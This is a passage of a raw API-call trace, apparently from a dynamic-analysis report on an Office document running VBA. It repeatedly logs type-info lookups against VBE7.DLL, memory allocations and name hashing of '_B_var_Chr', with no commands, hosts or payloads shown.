pwOrdinal=0x1d38ee9d7a0*=0xf3f0) returned 0x0 [0060.531] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="VBE7.DLL", cchWideChar=-1, lpMultiByteStr=0x7ffce0c00b70, cbMultiByte=1023, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="VBE7.DLL", lpUsedDefaultChar=0x0) returned 9 [0060.531] ITypeInfo:RemoteGetDllEntry (in: This=0x1d39d9d55e8, memid=1610612738, invkind=1, refPtrFlags=0x0, pBstrDllName=0x33e4fb42d0, pBstrName=0x0, pwOrdinal=0x33e4fb42f0 | out: pBstrDllName=0x33e4fb42d0*=0x0, pBstrName=0x0, pwOrdinal=0x33e4fb42f0*=0x4560) returned 0x0 [0060.531] ITypeInfo:RemoteGetDllEntry (in: This=0x1d39d9d55e8, memid=1610612738, invkind=1, refPtrFlags=0x0, pBstrDllName=0x0, pBstrName=0x33e4fb42d0, pwOrdinal=0x500000000 | out: pBstrDllName=0x0, pBstrName=0x33e4fb42d0, pwOrdinal=0x500000000) returned 0x0 [0060.532] IMalloc:Alloc (This=0x7ffd098ff3f0, cb=0xb) returned 0x1d39dbb3b90 [0060.532] _mbscpy_s (in: _Dst=0x1d39dbb3b90, _DstSizeInBytes=0x4, _Src=0x1d3a3172e3a | out: _Dst=0x1d39dbb3b90) returned 0x0 [0060.532] LHashValOfNameSysA (syskind=0x3, lcid=0x412, szName="_B_var_Chr") returned 0x503b5c [0060.532] IUnknown:AddRef (This=0x1d3980663b0) returned 0xc [0060.532] IUnknown:Release (This=0x1d3980663b0) returned 0xb [0060.532] IUnknown:AddRef (This=0x1d39d9d55e8) returned 0x3 [0060.532] IUnknown:Release (This=0x1d39d9d55e8) returned 0x2 [0060.532] IUnknown:QueryInterface (in: This=0x1d39d9d55e8, riid=0x7ffce0bcc368*(Data1=0xcacc1e82, Data2=0x622b, Data3=0x11d2, Data4=([0]=0xaa, [1]=0x78, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0x1, [7]=0xd2)), ppvObject=0x33e4fb4a98 | out: ppvObject=0x33e4fb4a98*=0x0) returned 0x80004002 [0060.532] IUnknown:QueryInterface (in: This=0x1d39d9d55e8, riid=0x7ffce0bcf4c0*(Data1=0xcacc1e83, Data2=0x622b, Data3=0x11d2, Data4=([0]=0xaa, [1]=0x78, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0x1, [7]=0xd2)), ppvObject=0x33e4fb4a90 | out: ppvObject=0x33e4fb4a90*=0x0) returned 0x80004002 [0060.532] IMalloc:Free (This=0x7ffd098ff3f0, pv=0x1d39dbb3b90) [0060.532] ITypeInfo:RemoteGetContainingTypeLib (in: This=0x1d39d9d55e8, ppTLib=0x33e4fb42d0, pIndex=0x0 | out: ppTLib=0x33e4fb42d0*=0x1d3980663b0, pIndex=0x0) returned 0x0 [0060.532] ITypeLib:RemoteGetLibAttr (in: This=0x1d3980663b0, ppTLibAttr=0x33e4fb42e0, pDummy=0x0 | out: ppTLibAttr=0x33e4fb42e0, pDummy=0x0) returned 0x0 [0060.532] ITypeLib:LocalReleaseTLibAttr (This=0x1d3980663b0) returned 0x0 [0060.532] IUnknown:Release (This=0x1d3980663b0) returned 0xb [0060.532] ITypeInfo:RemoteGetDllEntry (in: This=0x1d39d9d55e8, memid=1610612738, invkind=1, refPtrFlags=0xe4fb42d0, pBstrDllName=0x0, pBstrName=0x0, pwOrdinal=0x1d38ee9d7a0 | out: pBstrDllName=0x0, pBstrName=0x0, pwOrdinal=0x1d38ee9d7a0*=0xf3f0) returned 0x0 [0060.532] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="VBE7.DLL", cchWideChar=-1, lpMultiByteStr=0x7ffce0c00b70, cbMultiByte=1023, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="VBE7.DLL", lpUsedDefaultChar=0x0) returned 9 [0060.532] ITypeInfo:RemoteGetDllEntry (in: This=0x1d39d9d55e8, memid=1610612738, invkind=1, refPtrFlags=0x0, pBstrDllName=0x33e4fb42d0, pBstrName=0x0, pwOrdinal=0x33e4fb42f0 | out: pBstrDllName=0x33e4fb42d0*=0x0, pBstrName=0x0, pwOrdinal=0x33e4fb42f0*=0x4560) returned 0x0 [0060.532] ITypeInfo:RemoteGetDllEntry (in: This=0x1d39d9d55e8, memid=1610612738, invkind=1, refPtrFlags=0x0, pBstrDllName=0x0, pBstrName=0x33e4fb42d0, pwOrdinal=0x500000000 | out: pBstrDllName=0x0, pBstrName=0x33e4fb42d0, pwOrdinal=0x500000000) returned 0x0 [0060.532] IMalloc:Alloc (This=0x7ffd098ff3f0, cb=0xb) returned 0x1d39dbb3ab0 [0060.532] _mbscpy_s (in: _Dst=0x1d39dbb3ab0, _DstSizeInBytes=0x4, _Src=0x1d3a3172e3a | out: _Dst=0x1d39dbb3ab0) returned 0x0 [0060.532] LHashValOfNameSysA (syskind=0x3, lcid=0x412, szName="_B_var_Chr") returned 0x503b5c [0060.532] IUnknown:AddRef (This=0x1d3980663b0) returned 0xc [0060.532] IUnknown:Release (This=0x1d3980663b0) returned 0xb [0060.532] IUnknown:AddRef (This=0x1d39d9d55e8) returned 0x3 [0060.532] IUnknown:Release (This=0x1d39d9d55e8) returned 0x2 [0060.532] IUnknown:QueryInterface (in: This=0x1d39d9d55e8, riid=0x7ffce0bcc368*(Data1=0xcacc1e82, Data2=0x622b, Data3=0x11d2, Data4=([0]=0xaa, [1]=0x78, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0x1, [7]=0xd2)), ppvObject=0x33e4fb4a98 | out: ppvObject=0x33e4fb4a98*=0x0) returned 0x80004002 [0060.533] IUnknown:QueryInterface (in: This=0x1d39d9d55e8, riid=0x7ffce0bcf4c0*(Data1=0xcacc1e83, Data2=0x622b, Data3=0x11d2, Data4=([0]=0xaa, [1]=0x78, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0x1, [7]=0xd2)), ppvObject=0x33e4fb4a90 | out: ppvObject=0x33e4fb4a90*=0x0) returned 0x80004002 [0060.533] IMalloc:Free (This=0x7ffd098ff3f0, pv=0x1d39dbb3ab0) [0060.533] ITypeInfo:RemoteGetContainingTypeLib (in: This=0x1d39d9d55e8, ppTLib=0x33e4fb42d0, pIndex=0x0 | out: ppTLib=0x33e4fb42d0*=0x1d3980663b0, pIndex=0x0) returned 0x0 [0060.533] ITypeLib:RemoteGetLibAttr (in: This=0x1d3980663b0, ppTLibAttr=0x33e4fb42e0, pDummy=0x0 | out: ppTLibAttr=0x33e4fb42e0, pDummy=0x0) returned 0x0 [0060.533] ITypeLib:LocalReleaseTLibAttr (This=0x1d3980663b0) returned 0x0 [0060.533] IUnknown:Release (This=0x1d3980663b0) returned 0xb [0060.533] ITypeInfo:RemoteGetDllEntry (in: This=0x1d39d9d55e8, memid=1610612738, invkind=1, refPtrFlags=0xe4fb42d0, pBstrDllName=0x0, pBstrName=0x0, pwOrdinal=0x1d38ee9d7a0 | out: pBstrDllName=0x0, pBstrName=0x0, pwOrdinal=0x1d38ee9d7a0*=0xf3f0) returned 0x0 [0060.533] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="VBE7.DLL", cchWideChar=-1, lpMultiByteStr=0x7ffce0c00b70, cbMultiByte=1023, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="VBE7.DLL", lpUsedDefaultChar=0x0) returned 9 [0060.533] ITypeInfo:RemoteGetDllEntry (in: This=0x1d39d9d55e8, memid=1610612738, invkind=1, refPtrFlags=0x0, pBstrDllName=0x33e4fb42d0, pBstrName=0x0, pwOrdinal=0x33e4fb42f0 | out: pBstrDllName=0x33e4fb42d0*=0x0, pBstrName=0x0, pwOrdinal=0x33e4fb42f0*=0x4560) returned 0x0 [0060.533] ITypeInfo:RemoteGetDllEntry (in: This=0x1d39d9d55e8, memid=1610612738, invkind=1, refPtrFlags=0x0, pBstrDllName=0x0, pBstrName=0x33e4fb42d0, pwOrdinal=0x500000000 | out: pBstrDllName=0x0, pBstrName=0x33e4fb42d0, pwOrdinal=0x500000000) returned 0x0 [0060.533] IMalloc:Alloc (This=0x7ffd098ff3f0, cb=0xb) returned 0x1d39dbb37d0 [0060.533] _mbscpy_s (in: _Dst=0x1d39dbb37d0, _DstSizeInBytes=0x4, _Src=0x1d3a3172e3a | out: _Dst=0x1d39dbb37d0) returned 0x0 [0060.533] LHashValOfNameSysA (syskind=0x3, lcid=0x412, szName="_B_var_Chr") returned 0x503b5c [0060.533] IUnknown:AddRef (This=0x1d3980663b0) returned 0xc [0060.533] IUnknown:Release (This=0x1d3980663b0) returned 0xb [0060.533] IUnknown:AddRef (This=0x1d39d9d55e8) returned 0x3 [0060.533] IUnknown:Release (This=0x1d39d9d55e8) returned 0x2 [0060.533] IUnknown:QueryInterface (in: This=0x1d39d9d55e8, riid=0x7ffce0bcc368*(Data1=0xcacc1e82, Data2=0x622b, Data3=0x11d2, Data4=([0]=0xaa, [1]=0x78, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0x1, [7]=0xd2)), ppvObject=0x33e4fb4a98 | out: ppvObject=0x33e4fb4a98*=0x0) returned 0x80004002 [0060.533] IUnknown:QueryInterface (in: This=0x1d39d9d55e8, riid=0x7ffce0bcf4c0*(Data1=0xcacc1e83, Data2=0x622b, Data3=0x11d2, Data4=([0]=0xaa, [1]=0x78, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0x1, [7]=0xd2)), ppvObject=0x33e4fb4a90 | out: ppvObject=0x33e4fb4a90*=0x0) returned 0x80004002 [0060.533] IMalloc:Free (This=0x7ffd098ff3f0, pv=0x1d39dbb37d0) [0060.533] ITypeInfo:RemoteGetContainingTypeLib (in: This=0x1d39d9d55e8, ppTLib=0x33e4fb42d0, pIndex=0x0 | out: ppTLib=0x33e4fb42d0*=0x1d3980663b0, pIndex=0x0) returned 0x0 [0060.533] ITypeLib:RemoteGetLibAttr (in: This=0x1d3980663b0, ppTLibAttr=0x33e4fb42e0, pDummy=0x0 | out: ppTLibAttr=0x33e4fb42e0, pDummy=0x0) returned 0x0 [0060.533] ITypeLib:LocalReleaseTLibAttr (This=0x1d3980663b0) returned 0x0 [0060.533] IUnknown:Release (This=0x1d3980663b0) returned 0xb [0060.533] ITypeInfo:RemoteGetDllEntry (in: This=0x1d39d9d55e8, memid=1610612738, invkind=1, refPtrFlags=0xe4fb42d0, pBstrDllName=0x0, pBstrName=0x0, pwOrdinal=0x1d38ee9d7a0 | out: pBstrDllName=0x0, pBstrName=0x0, pwOrdinal=0x1d38ee9d7a0*=0xf3f0) returned 0x0 [0060.533] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="VBE7.DLL", cchWideChar=-1, lpMultiByteStr=0x7ffce0c00b70, cbMultiByte=1023, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="VBE7.DLL", lpUsedDefaultChar=0x0) returned 9 [0060.533] ITypeInfo:RemoteGetDllEntry (in: This=0x1d39d9d55e8, memid=1610612738, invkind=1, refPtrFlags=0x0, pBstrDllName=0x33e4fb42d0, pBstrName=0x0, pwOrdinal=0x33e4fb42f0 | out: pBstrDllName=0x33e4fb42d0*=0x0, pBstrName=0x0, pwOrdinal=0x33e4fb42f0*=0x4560) returned 0x0 [0060.533] ITypeInfo:RemoteGetDllEntry (in: This=0x1d39d9d55e8, memid=1610612738, invkind=1, refPtrFlags=0x0, pBstrDllName=0x0, pBstrName=0x33e4fb42d0, pwOrdinal=0x500000000 | out: pBstrDllName=0x0, pBstrName=0x33e4fb42d0, pwOrdinal=0x500000000) returned 0x0 [0060.534] IMalloc:Alloc (This=0x7ffd098ff3f0, cb=0xb) returned 0x1d39dbb3770 [0060.534] _mbscpy_s (in: _Dst=0x1d39dbb3770, _DstSizeInBytes=0x4, _Src=0x1d3a3172e3a | out: _Dst=0x1d39dbb3770) returned 0x0 [0060.534] LHashValOfNameSysA (syskind=0x3, lcid=0x412, szName="_B_var_Chr") returned 0x503b5c [0060.534] IUnknown:AddRef (This=0x1d3980663b0) returned 0xc [0060.534] IUnknown:Release (This=0x1d3980663b0) returned 0xb [0060.534] IUnknown:AddRef (This=0x1d39d9d55e8) returned 0x3 [0060.534] IUnknown:Release (This=0x1d39d9d55e8) returned 0x2 [0060.534] IUnknown:QueryInterface (in: This=0x1d39d9d55e8, riid=0x7ffce0bcc368*(Data1=0xcacc1e82, Data2=0x622b, Data3=0x11d2, Data4=([0]=0xaa, [1]=0x78, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0x1, [7]=0xd2)), ppvObject=0x33e4fb4a98 | out: ppvObject=0x33e4fb4a98*=0x0) returned 0x80004002 [0060.534] IUnknown:QueryInterface (in: This=0x1d39d9d55e8, riid=0x7ffce0bcf4c0*(Data1=0xcacc1e83, Data2=0x622b, Data3=0x11d2, Data4=([0]=0xaa, [1]=0x78, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0x1, [7]=0xd2)), ppvObject=0x33e4fb4a90 | out: ppvObject=0x33e4fb4a90*=0x0) returned 0x80004002 [0060.534] IMalloc:Free (This=0x7ffd098ff3f0, pv=0x1d39dbb3770) [0060.534] ITypeInfo:RemoteGetContainingTypeLib (in: This=0x1d39d9d55e8, ppTLib=0x33e4fb42d0, pIndex=0x0 | out: ppTLib=0x33e4fb42d0*=0x1d3980663b0, pIndex=0x0) returned 0x0 [0060.534] ITypeLib:RemoteGetLibAttr (in: This=0x1d3980663b0, ppTLibAttr=0x33e4fb42e0, pDummy=0x0 | out: ppTLibAttr=0x33e4fb42e0, pDummy=0x0) returned 0x0 [0060.534] ITypeLib:LocalReleaseTLibAttr (This=0x1d3980663b0) returned 0x0 [0060.534] IUnknown:Release (This=0x1d3980663b0) returned 0xb [0060.534] ITypeInfo:RemoteGetDllEntry (in: This=0x1d39d9d55e8, memid=1610612738, invkind=1, refPtrFlags=0xe4fb42d0, pBstrDllName=0x0, pBstrName=0x0, pwOrdinal=0x1d38ee9d7a0 | out: pBstrDllName=0x0, pBstrName=0x0, pwOrdinal=0x1d38ee9d7a0*=0xf3f0) returned 0x0 [0060.534] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="VBE7.DLL", cchWideChar=-1, lpMultiByteStr=0x7ffce0c00b70, cbMultiByte=1023, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="VBE7.DLL", lpUsedDefaultChar=0x0) returned 9 [0060.534] ITypeInfo:RemoteGetDllEntry (in: This=0x1d39d9d55e8, memid=1610612738, invkind=1, refPtrFlags=0x0, pBstrDllName=0x33e4fb42d0, pBstrName=0x0, pwOrdinal=0x33e4fb42f0 | out: pBstrDllName=0x33e4fb42d0*=0x0, pBstrName=0x0, pwOrdinal=0x33e4fb42f0*=0x4560) returned 0x0 [0060.534] ITypeInfo:RemoteGetDllEntry (in: This=0x1d39d9d55e8, memid=1610612738, invkind=1, refPtrFlags=0x0, pBstrDllName=0x0, pBstrName=0x33e4fb42d0, pwOrdinal=0x500000000 | out: pBstrDllName=0x0, pBstrName=0x33e4fb42d0, pwOrdinal=0x500000000) returned 0x0 [0060.534] IMalloc:Alloc (This=0x7ffd098ff3f0, cb=0xb) returned 0x1d39dbb3d90 [0060.534] _mbscpy_s (in: _Dst=0x1d39dbb3d90, _DstSizeInBytes=0x4, _Src=0x1d3a3172e3a | out: _Dst=0x1d39dbb3d90) returned 0x0 [0060.534] LHashValOfNameSysA (syskind=0x3, lcid=0x412, szName="_B_var_Chr") returned 0x503b5c [0060.534] IUnknown:AddRef (This=0x1d3980663b0) returned 0xc [0060.534] IUnknown:Release (This=0x1d3980663b0) returned 0xb [0060.534] IUnknown:AddRef (This=0x1d39d9d55e8) returned 0x3 [0060.534] IUnknown:Release (This=0x1d39d9d55e8) returned 0x2 [0060.534] IUnknown:QueryInterface (in: This=0x1d39d9d55e8, riid=0x7ffce0bcc368*(Data1=0xcacc1e82, Data2=0x622b, Data3=0x11d2, Data4=([0]=0xaa, [1]=0x78, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0x1, [7]=0xd2)), ppvObject=0x33e4fb4a98 | out: ppvObject=0x33e4fb4a98*=0x0) returned 0x80004002 [0060.535] IUnknown:QueryInterface (in: This=0x1d39d9d55e8, riid=0x7ffce0bcf4c0*(Data1=0xcacc1e83, Data2=0x622b, Data3=0x11d2, Data4=([0]=0xaa, [1]=0x78, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0x1, [7]=0xd2)), ppvObject=0x33e4fb4a90 | out: ppvObject=0x33e4fb4a90*=0x0) returned 0x80004002 [0060.535] IMalloc:Free (This=0x7ffd098ff3f0, pv=0x1d39dbb3d90) [0060.535] ITypeInfo:RemoteGetContainingTypeLib (in: This=0x1d39d9d55e8, ppTLib=0x33e4fb42d0, pIndex=0x0 | out: ppTLib=0x33e4fb42d0*=0x1d3980663b0, pIndex=0x0) returned 0x0 [0060.535] ITypeLib:RemoteGetLibAttr (in: This=0x1d3980663b0, ppTLibAttr=0x33e4fb42e0, pDummy=0x0 | out: ppTLibAttr=0x33e4fb42e0, pDummy=0x0) returned 0x0 [0060.535] ITypeLib:LocalReleaseTLibAttr (This=0x1d3980663b0) returned 0x0 [0060.535] IUnknown:Release (This=0x1d3980663b0) returned 0xb [0060.535] ITypeInfo:RemoteGetDllEntry (in: This=0x1d39d9d55e8, memid=1610612738, invkind=1, refPtrFlags=0xe4fb42d0, pBstrDllName=0x0, pBstrName=0x0, pwOrdinal=0x1d38ee9d7a0 | out: pBstrDllName=0x0, pBstrName=0x0, pwOrdinal=0x1d38ee9d7a0*=0xf3f0) returned 0x0 [0060.535] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="VBE7.DLL", cchWideChar=-1, lpMultiByteStr=0x7ffce0c00b70, cbMultiByte=1023, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="VBE7.DLL", lpUsedDefaultChar=0x0) returned 9 [0060.535] ITypeInfo:RemoteGetDllEntry (in: This=0x1d39d9d55e8, memid=1610612738, invkind=1, refPtrFlags=0x0, pBstrDllName=0x33e4fb42d0, pBstrName=0x0, pwOrdinal=0x33e4fb42f0 | out: pBstrDllName=0x33e4fb42d0*=0x0, pBstrName=0x0, pwOrdinal=0x33e4fb42f0*=0x4560) returned 0x0 [0060.535] ITypeInfo:RemoteGetDllEntry (in: This=0x1d39d9d55e8, memid=1610612738, invkind=1, refPtrFlags=0x0, pBstrDllName=0x0, pBstrName=0x33e4fb42d0, pwOrdinal=0x500000000 | out: pBstrDllName=0x0, pBstrName=0x33e4fb42d0, pwOrdinal=0x500000000) returned 0x0 [0060.535] IMalloc:Alloc (This=0x7ffd098ff3f0, cb=0xb) returned 0x1d39dbb3b50 [0060.535] _mbscpy_s (in: _Dst=0x1d39dbb3b50, _DstSizeInBytes=0x4, _Src=0x1d3a3172e3a | out: _Dst=0x1d39dbb3b50) returned 0x0 [0060.535] LHashValOfNameSysA (syskind=0x3, lcid=0x412, szName="_B_var_Chr") returned 0x503b5c [0060.535] IUnknown:AddRef (This=0x1d3980663b0) returned 0xc [0060.535] IUnknown:Release (This=0x1d3980663b0) returned 0xb [0060.535] IUnknown:AddRef (This=0x1d39d9d55e8) returned 0x3 [0060.535] IUnknown:Release (This=0x1d39d9d55e8) returned 0x2 [0060.535] IUnknown:QueryInterface (in: This=0x1d39d9d55e8, riid=0x7ffce0bcc368*(Data1=0xcacc1e82, Data2=0x622b, Data3=0x11d2, Data4=([0]=0xaa, [1]=0x78, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0x1, [7]=0xd2)), ppvObject=0x33e4fb4a98 | out: ppvObject=0x33e4fb4a98*=0x0) returned 0x80004002 [0060.535] IUnknown:QueryInterface (in: This=0x1d39d9d55e8, riid=0x7ffce0bcf4c0*(Data1=0xcacc1e83, Data2=0x622b, Data3=0x11d2, Data4=([0]=0xaa, [1]=0x78, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0x1, [7]=0xd2)), ppvObject=0x33e4fb4a90 | out: ppvObject=0x33e4fb4a90*=0x0) returned 0x80004002 [0060.535] IMalloc:Free (This=0x7ffd098ff3f0, pv=0x1d39dbb3b50) [0060.535] ITypeInfo:RemoteGetContainingTypeLib (in: This=0x1d39d9d55e8, ppTLib=0x33e4fb42d0, pIndex=0x0 | out: ppTLib=0x33e4fb42d0*=0x1d3980663b0, pIndex=0x0) returned 0x0 [0060.535] ITypeLib:RemoteGetLibAttr (in: This=0x1d3980663b0, ppTLibAttr=0x33e4fb42e0, pDummy=0x0 | out: ppTLibAttr=0x33e4fb42e0, pDummy=0x0) returned 0x0 [0060.535] ITypeLib:LocalReleaseTLibAttr (This=0x1d3980663b0) returned 0x0 [0060.535] IUnknown:Release (This=0x1d3980663b0) returned 0xb [0060.535] ITypeInfo:RemoteGetDllEntry (in: This=0x1d39d9d55e8, memid=1610612738, invkind=1, refPtrFlags=0xe4fb42d0, pBstrDllName=0x0, pBstrName=0x0, pwOrdinal=0x1d38ee9d7a0 | out: pBstrDllName=0x0, pBstrName=0x0, pwOrdinal=0x1d38ee9d7a0*=0xf3f0) returned 0x0 [0060.535] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="VBE7.DLL", cchWideChar=-1, lpMultiByteStr=0x7ffce0c00b70, cbMultiByte=1023, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="VBE7.DLL", lpUsedDefaultChar=0x0) returned 9 [0060.535] ITypeInfo:RemoteGetDllEntry (in: This=0x1d39d9d55e8, memid=1610612738, invkind=1, refPtrFlags=0x0, pBstrDllName=0x33e4fb42d0, pBstrName=0x0, pwOrdinal=0x33e4fb42f0 | out: pBstrDllName=0x33e4fb42d0*=0x0, pBstrName=0x0, pwOrdinal=0x33e4fb42f0*=0x4560) returned 0x0 [0060.535] ITypeInfo:RemoteGetDllEntry (in: This=0x1d39d9d55e8, memid=1610612738, invkind=1, refPtrFlags=0x0, pBstrDllName=0x0, pBstrName=0x33e4fb42d0, pwOrdinal=0x500000000 | out: pBstrDllName=0x0, pBstrName=0x33e4fb42d0, pwOrdinal=0x500000000) returned 0x0 [0060.536] IMalloc:Alloc (This=0x7ffd098ff3f0, cb=0xb) returned 0x1d39dbb3d90 [0060.536] _mbscpy_s (in: _Dst=0x1d39dbb3d90, _DstSizeInBytes=0x4, _Src=0x1d3a3172e3a | out: _Dst=0x1d39dbb3d90) returned 0x0 [0060.536] LHashValOfNameSysA (syskind=0x3, lcid=0x412, szName="_B_var_Chr") returned 0x503b5c [0060.536] IUnknown:AddRef (This=0x1d3980663b0) returned 0xc [0060.536] IUnknown:Release (This=0x1d3980663b0) returned 0xb [0060.536] IUnknown:AddRef (This=0x1d39d9d55e8) returned 0x3 [0060.536] IUnknown:Release (This=0x1d39d9d55e8) returned 0x2 [0060.536] IUnknown:QueryInterface (in: This=0x1d39d9d55e8, riid=0x7ffce0bcc368*(Data1=0xcacc1e82, Data2=0x622b, Data3=0x11d2, Data4=([0]=0xaa, [1]=0x78, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0x1, [7]=0xd2)), ppvObject=0x33e4fb4a98 | out: ppvObject=0x33e4fb4a98*=0x0) returned 0x80004002 [0060.536] IUnknown:QueryInterface (in: This=0x1d39d9d55e8, riid=0x7ffce0bcf4c0*(Data1=0xcacc1e83, Data2=0x622b, Data3=0x11d2, Data4=([0]=0xaa, [1]=0x78, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0x1, [7]=0xd2)), ppvObject=0x33e4fb4a90 | out: ppvObject=0x33e4fb4a90*=0x0) returned 0x80004002 [0060.536] IMalloc:Free (This=0x7ffd098ff3f0, pv=0x1d39dbb3d90) [0060.536] ITypeInfo:RemoteGetContainingTypeLib (in: This=0x1d39d9d55e8, ppTLib=0x33e4fb42d0, pIndex=0x0 | out: ppTLib=0x33e4fb42d0*=0x1d3980663b0, pIndex=0x0) returned 0x0 [0060.536] ITypeLib:RemoteGetLibAttr (in: This=0x1d3980663b0, ppTLibAttr=0x33e4fb42e0, pDummy=0x0 | out: ppTLibAttr=0x33e4fb42e0, pDummy=0x0) returned 0x0 [0060.536] ITypeLib:LocalReleaseTLibAttr (This=0x1d3980663b0) returned 0x0 [0060.536] IUnknown:Release (This=0x1d3980663b0) returned 0xb [0060.536] ITypeInfo:RemoteGetDllEntry (in: This=0x1d39d9d55e8, memid=1610612738, invkind=1, refPtrFlags=0xe4fb42d0, pBstrDllName=0x0, pBstrName=0x0, pwOrdinal=0x1d38ee9d7a0 | out: pBstrDllName=0x0, pBstrName=0x0, pwOrdinal=0x1d38ee9d7a0*=0xf3f0) returned 0x0 [0060.536] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="VBE7.DLL", cchWideChar=-1, lpMultiByteStr=0x7ffce0c00b70, cbMultiByte=1023, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="VBE7.DLL", lpUsedDefaultChar=0x0) returned 9 [0060.536] ITypeInfo:RemoteGetDllEntry (in: This=0x1d39d9d55e8, memid=1610612738, invkind=1, refPtrFlags=0x0, pBstrDllName=0x33e4fb42d0, pBstrName=0x0, pwOrdinal=0x33e4fb42f0 | out: pBstrDllName=0x33e4fb42d0*=0x0, pBstrName=0x0, pwOrdinal=0x33e4fb42f0*=0x4560) returned 0x0 [0060.536] ITypeInfo:RemoteGetDllEntry (in: This=0x1d39d9d55e8, memid=1610612738, invkind=1, refPtrFlags=0x0, pBstrDllName=0x0, pBstrName=0x33e4fb42d0, pwOrdinal=0x500000000 | out: pBstrDllName=0x0, pBstrName=0x33e4fb42d0, pwOrdinal=0x500000000) returned 0x0 [0060.536] IMalloc:Alloc (This=0x7ffd098ff3f0, cb=0xb) returned 0x1d39dbb3770 [0060.536] _mbscpy_s (in: _Dst=0x1d39dbb3770, _DstSizeInBytes=0x4, _Src=0x1d3a3172e3a | out: _Dst=0x1d39dbb3770) returned 0x0 [0060.536] LHashValOfNameSysA (syskind=0x3, lcid=0x412, szName="_B_var_Chr") returned 0x503b5c [0060.536] IUnknown:AddRef (This=0x1d3980663b0) returned 0xc [0060.536] IUnknown:Release (This=0x1d3980663b0) returned 0xb [0060.536] IUnknown:AddRef (This=0x1d39d9d55e8) returned 0x3 [0060.536] IUnknown:Release (This=0x1d39d9d55e8) returned 0x2 [0060.536] IUnknown:QueryInterface (in: This=0x1d39d9d55e8, riid=0x7ffce0bcc368*(Data1=0xcacc1e82, Data2=0x622b, Data3=0x11d2, Data4=([0]=0xaa, [1]=0x78, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0x1, [7]=0xd2)), ppvObject=0x33e4fb4a98 | out: ppvObject=0x33e4fb4a98*=0x0) returned 0x80004002 [0060.536] IUnknown:QueryInterface (in: This=0x1d39d9d55e8, riid=0x7ffce0bcf4c0*(Data1=0xcacc1e83, Data2=0x622b, Data3=0x11d2, Data4=([0]=0xaa, [1]=0x78, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0x1, [7]=0xd2)), ppvObject=0x33e4fb4a90 | out: ppvObject=0x33e4fb4a90*=0x0) returned 0x80004002 [0060.536] IMalloc:Free (This=0x7ffd098ff3f0, pv=0x1d39dbb3770) [0060.536] ITypeInfo:RemoteGetContainingTypeLib (in: This=0x1d39d9d55e8, ppTLib=0x33e4fb42d0, pIndex=0x0 | out: ppTLib=0x33e4fb42d0*=0x1d3980663b0, pIndex=0x0) returned 0x0 [0060.537] ITypeLib:RemoteGetLibAttr (in: This=0x1d3980663b0, ppTLibAttr=0x33e4fb42e0, pDummy=0x0 | out: ppTLibAttr=0x33e4fb42e0, pDummy=0x0) returned 0x0 [0060.537] ITypeLib:LocalReleaseTLibAttr (This=0x1d3980663b0) returned 0x0 [0060.537] IUnknown:Release (This=0x1d3980663b0) returned 0xb [0060.537] ITypeInfo:RemoteGetDllEntry (in: This=0x1d39d9d55e8, memid=1610612738, invkind=1, refPtrFlags=0xe4fb42d0, pBstrDllName=0x0, pBstrName=0x0, pwOrdinal=0x1d38ee9d7a0 | out: pBstrDllName=0x0, pBstrName=0x0, pwOrdinal=0x1d38ee9d7a0*=0xf3f0) returned 0x0 [0060.537] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="VBE7.DLL", cchWideChar=-1, lpMultiByteStr=0x7ffce0c00b70, cbMultiByte=1023, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="VBE7.DLL", lpUsedDefaultChar=0x0) returned 9 [0060.537] ITypeInfo:RemoteGetDllEntry (in: This=0x1d39d9d55e8, memid=1610612738, invkind=1, refPtrFlags=0x0, pBstrDllName=0x33e4fb42d0, pBstrName=0x0, pwOrdinal=0x33e4fb42f0 | out: pBstrDllName=0x33e4fb42d0*=0x0, pBstrName=0x0, pwOrdinal=0x33e4fb42f0*=0x4560) returned 0x0 [0060.537] ITypeInfo:RemoteGetDllEntry (in: This=0x1d39d9d55e8, memid=1610612738, invkind=1, refPtrFlags=0x0, pBstrDllName=0x0, pBstrName=0x33e4fb42d0, pwOrdinal=0x500000000 | out: pBstrDllName=0x0, pBstrName=0x33e4fb42d0, pwOrdinal=0x500000000) returned 0x0 [0060.537] 